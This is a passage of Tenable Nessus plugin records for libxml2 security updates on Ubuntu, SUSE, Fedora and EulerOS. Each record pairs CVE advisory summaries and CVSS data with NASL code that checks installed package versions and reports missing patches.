Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-03-17T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : libxml2 vulnerabilities (USN-3235-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4448", "CVE-2016-4658", "CVE-2016-5131"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libxml2", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:16.10"], "id": "UBUNTU_USN-3235-1.NASL", "href": "https://www.tenable.com/plugins/nessus/97793", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3235-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97793);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2016-4448\", \"CVE-2016-4658\", \"CVE-2016-5131\");\n script_xref(name:\"USN\", value:\"3235-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 16.04 LTS / 16.10 : libxml2 vulnerabilities (USN-3235-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that libxml2 incorrectly handled format strings. If\na user or automated system were tricked into opening a specially\ncrafted document, an attacker could possibly cause libxml2 to crash,\nresulting in a denial of service. This issue only affected Ubuntu\n12.04 LTS, Ubuntu 14.04 LTS, and Ubuntu 16.04 LTS. (CVE-2016-4448)\n\nIt was discovered that libxml2 incorrectly handled certain malformed\ndocuments. If a user or automated system were tricked into opening a\nspecially crafted document, an attacker could cause libxml2 to crash,\nresulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2016-4658)\n\nNick Wellnhofer discovered that libxml2 incorrectly handled certain\nmalformed documents. If a user or automated system were tricked into\nopening a specially crafted document, an attacker could cause libxml2\nto crash, resulting in a denial of service, or possibly execute\narbitrary code. (CVE-2016-5131).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3235-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2023 Canonical, Inc. / NASL script (C) 2017-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(12\\.04|14\\.04|16\\.04|16\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04 / 14.04 / 16.04 / 16.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libxml2\", pkgver:\"2.7.8.dfsg-5.1ubuntu4.17\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libxml2\", pkgver:\"2.9.1+dfsg1-3ubuntu4.9\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libxml2\", pkgver:\"2.9.3+dfsg1-1ubuntu0.2\")) flag++;\nif (ubuntu_check(osver:\"16.10\", pkgname:\"libxml2\", pkgver:\"2.9.4+dfsg1-2ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:49", "description": "This update for libxml2 fixes several issues. 
These security issues were fixed :\n\n - CVE-2017-16932: Fixed infinite recursion could lead to an infinite loop or memory exhaustion when expanding a parameter entity in a DTD (bsc#1069689).\n\n - CVE-2017-15412: Prevent use after free when calling XPath extension functions that allowed remote attackers to cause DoS or potentially RCE (bsc#1077993)\n\n - CVE-2016-5131: Use-after-free vulnerability in libxml2 allowed remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to function. (bsc#1078813)\n\n - CVE-2017-5130: Fixed a potential remote buffer overflow in function xmlMemoryStrdup() (bsc#1078806)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-02-09T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : libxml2 (SUSE-SU-2018:0395-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2017-15412", "CVE-2017-16932", "CVE-2017-5130"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libxml2", "p-cpe:/a:novell:suse_linux:libxml2-doc", "p-cpe:/a:novell:suse_linux:libxml2-python", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2018-0395-1.NASL", "href": "https://www.tenable.com/plugins/nessus/106707", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:0395-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106707);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-5131\", 
\"CVE-2017-15412\", \"CVE-2017-16932\", \"CVE-2017-5130\");\n\n script_name(english:\"SUSE SLES11 Security Update : libxml2 (SUSE-SU-2018:0395-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libxml2 fixes several issues. Theses security issues\nwere fixed :\n\n - CVE-2017-16932: Fixed infinite recursion could lead to\n an infinite loop or memory exhaustion when expanding a\n parameter entity in a DTD (bsc#1069689).\n\n - CVE-2017-15412: Prevent use after free when calling\n XPath extension functions that allowed remote attackers\n to cause DoS or potentially RCE (bsc#1077993)\n\n - CVE-2016-5131: Use-after-free vulnerability in libxml2\n allowed remote attackers to cause a denial of service or\n possibly have unspecified other impact via vectors\n related to the XPointer range-to function. (bsc#1078813)\n\n - CVE-2017-5130: Fixed a potential remote buffer overflow\n in function xmlMemoryStrdup() (bsc#1078806)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1069689\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1078806\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1078813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5131/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-15412/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-16932/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-5130/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20180395-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?595b9055\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-libxml2-13458=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-libxml2-13458=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-libxml2-13458=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"libxml2-32bit-2.7.6-0.77.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"libxml2-32bit-2.7.6-0.77.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libxml2-2.7.6-0.77.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libxml2-doc-2.7.6-0.77.10.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"libxml2-python-2.7.6-0.77.10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:31", "description": "Update to 2.9.7 which hopefully fixes all security issues\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-01-31T00:00:00", "type": "nessus", "title": "Fedora 27 : libxml2 (2018-db610fff5b)", "bulletinFamily": "scanner", "cvss2": 
{}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131", "CVE-2017-8872", "CVE-2017-9047"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libxml2", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2018-DB610FFF5B.NASL", "href": "https://www.tenable.com/plugins/nessus/106521", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-db610fff5b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106521);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-4658\", \"CVE-2016-5131\", \"CVE-2017-8872\", \"CVE-2017-9047\");\n script_xref(name:\"FEDORA\", value:\"2018-db610fff5b\");\n\n script_name(english:\"Fedora 27 : libxml2 (2018-db610fff5b)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 2.9.7 which hopefully fixes all security issues\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-db610fff5b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"libxml2-2.9.7-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:38", "description": "Update to 2.9.7 which hopefully fixes all security issues\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-02-15T00:00:00", "type": "nessus", "title": "Fedora 26 : libxml2 (2018-a6b59d8f78)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131", "CVE-2017-8872", "CVE-2017-9047"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libxml2", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-A6B59D8F78.NASL", "href": "https://www.tenable.com/plugins/nessus/106828", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-a6b59d8f78.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106828);\n script_version(\"3.4\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-4658\", \"CVE-2016-5131\", \"CVE-2017-8872\", \"CVE-2017-9047\");\n script_xref(name:\"FEDORA\", value:\"2018-a6b59d8f78\");\n\n script_name(english:\"Fedora 26 : libxml2 (2018-a6b59d8f78)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 2.9.7 which hopefully fixes all security issues\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-a6b59d8f78\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"libxml2-2.9.7-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:28", "description": "According to the versions of the libxml2 packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - Use-after-free vulnerability in libxml2 through 2.9.4, as used in Google Chrome before 52.0.2743.82, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to the XPointer range-to 
function.(CVE-2016-5131)\n\n - parser.c in libxml2 before 2.9.5 mishandles parameter-entity references because the NEXTL macro calls the xmlParserHandlePEReference function in the case of a '%' character in a DTD name.(CVE-2017-16931)\n\n - parser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.(CVE-2017-16932)\n\n - A flaw in libxml2 allows remote XML entity inclusion with default parser flags (i.e., when the caller did not request entity substitution, DTD validation, external DTD subset loading, or default DTD attributes). Depending on the context, this may expose a higher-risk attack surface in libxml2 not usually reachable with default parser flags, and expose content from local files, HTTP, or FTP servers (which might be otherwise unreachable).(CVE-2017-7375)\n\n - Buffer overflow in libxml2 allows remote attackers to execute arbitrary code by leveraging an incorrect limit for port values when handling redirects.(CVE-2017-7376)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-05-02T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP2 : libxml2 (EulerOS-SA-2018-1089)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5131", "CVE-2017-16931", "CVE-2017-16932", "CVE-2017-7375", "CVE-2017-7376"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:libxml2", "p-cpe:/a:huawei:euleros:libxml2-devel", "p-cpe:/a:huawei:euleros:libxml2-python", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1089.NASL", "href": "https://www.tenable.com/plugins/nessus/109487", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109487);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-5131\",\n \"CVE-2017-16931\",\n \"CVE-2017-16932\",\n \"CVE-2017-7375\",\n \"CVE-2017-7376\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : libxml2 (EulerOS-SA-2018-1089)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the libxml2 packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - Use-after-free vulnerability in libxml2 through 2.9.4,\n as used in Google Chrome before 52.0.2743.82, allows\n remote attackers to cause a denial of service or\n possibly have unspecified other impact via vectors\n related to the XPointer range-to\n function.(CVE-2016-5131)\n\n - parser.c in libxml2 before 2.9.5 mishandles\n parameter-entity references because the NEXTL macro\n calls 
the xmlParserHandlePEReference function in the\n case of a '%' character in a DTD name.(CVE-2017-16931)\n\n - parser.c in libxml2 before 2.9.5 does not prevent\n infinite recursion in parameter\n entities.(CVE-2017-16932)\n\n - A flaw in libxml2 allows remote XML entity inclusion\n with default parser flags (i.e., when the caller did\n not request entity substitution, DTD validation,\n external DTD subset loading, or default DTD\n attributes). Depending on the context, this may expose\n a higher-risk attack surface in libxml2 not usually\n reachable with default parser flags, and expose content\n from local files, HTTP, or FTP servers (which might be\n otherwise unreachable).(CVE-2017-7375)\n\n - Buffer overflow in libxml2 allows remote attackers to\n execute arbitrary code by leveraging an incorrect limit\n for port values when handling redirects.(CVE-2017-7376)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
